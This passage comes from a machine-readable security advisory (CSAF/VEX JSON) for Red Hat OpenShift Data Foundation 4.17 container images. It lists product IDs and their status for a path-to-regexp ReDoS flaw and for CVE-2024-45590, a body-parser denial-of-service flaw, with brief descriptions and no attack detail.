"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
